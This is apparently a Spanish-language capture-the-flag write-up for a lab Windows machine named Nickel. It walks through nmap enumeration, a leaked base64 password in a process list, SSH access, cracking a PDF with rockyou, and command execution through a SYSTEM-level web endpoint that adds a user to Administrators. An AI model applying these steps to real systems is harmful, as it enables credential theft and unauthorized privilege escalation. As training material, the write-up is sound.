Una máquina muy sencillita en la cual se obtienen credenciales leakeadas en un fichero de un servicio web expuesto. Posteriormente se utilizan dichas credenciales para acceder vía ssh y extraer un PDF que contiene información interesante donde se indica un servicio web que se ejecuta con permisos de administrador y a través del cuál se pueden ejecutar comandos.
Se enumeran los pasos con más detalle.
Enumeración de servicios y obtención de un servicio web con un endpoint que muestra información sobre las credenciales del usuario ariah.
Acceso vía ssh y obtención de un fichero PDF protegido con contraseña en la carpeta del servicio ftp.
Cracking del fichero PDF y obtención de la contraseña con el diccionario de rockyou.txt.
Obtención de información en el fichero sobre un endpoint que permite ejecución de comandos como nt authority\system.
Se añade a ariah al grupo de administradores y PWNED!.
Enumeración
Escáner con nmap
Enumeración básica de todos los servicios vía TCP, UDP y SCTP:
El segundo escáner (nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP) nos da la siguiente información:
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
| 256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_ 256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-19T12:21:38+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023-02-19T12:19:27+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-02-18T12:02:35
|_Not valid after: 2023-08-20T12:02:35
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.223.99
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.223.99:8089/
| Form id:
| Form action: http://169.254.109.39:33333/list-current-deployments
|
| Path: http://192.168.223.99:8089/
| Form id:
| Form action: http://169.254.109.39:33333/list-running-procs
|
| Path: http://192.168.223.99:8089/
| Form id:
|_ Form action: http://169.254.109.39:33333/list-active-nodes
|_http-title: Site doesn't have a title.
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
33333/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd :
| <p>Not Implemented</p>
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_ http://www.exploit-db.com/exploits/1244/
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb-vuln-ms10-054: false
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
Análisis del escáner
Se obtienen distintas URLs y servicios abiertos, realizando una enumeración básica de cada uno, se obtiene un endpoint que resulta interesante.
http://169.254.109.39:33333/list-running-procs
Modificando la petición con la IP de la máquina víctima y para que la petición se realice con el método HTTP POST en vez de GET, se obtiene lo siguiente:
POST /list-running-procs HTTP/1.1
Host: 192.168.155.99:33333
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : dwm.exe
commandline : "dwm.exe"
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
name : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
name : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
name : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
name : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d
name : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : SgrmBroker.exe
commandline :
name : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding
name : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
Entre la información, obtenemos un nombre de usuario y contraseña, que por sus características, se deduce que está codificada en base64.
Una vez se han obtenido credenciales válidas en el servidor, se prueba a acceder con dichas credenciales en los servicios disponibles, entre ellos ssh y ftp:
Al intentar abrir el fichero, se observa que tiene contraseña. Por lo que realizaremos un ataque por diccionario con pdfcrack utilizando el diccionario de rockyou.txt:
En el endpoint "Temporary Command" parece que podría ser posible ejecutar comandos, vamos a ver si hay suerte y es posible que el servicio se esté ejecutando como Administrador.
Desde la sesión SSH, se ejecuta el comando curl contra el endpoint con el comando whoami:
curl http://localhost/?whoami
Se obtiene la siguiente respuesta:
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>nt authority\system
</pre>
</body></html>
Ejecutamos lo siguiente para cambiar a powershell:
ariah@NICKEL C:\>powershell.exe
Se realiza la petición y se obtiene el contenido de la respuesta
PS C:\Users\Administrator> $response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsin
g
PS C:\Users\Administrator> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 26 Feb 2023 21:19:54 GMT
Last-Modified: Sun, 26 Feb 2023 13:19:54 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>The command completed successfully.
</pre>
</body></html>
Se comprueba que el usuario se ha añadido en el grupo de administradores:
PS C:\Users\Administrator> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.
Y ya se puede leer la flag que se encuentra en el escritorio del administrador: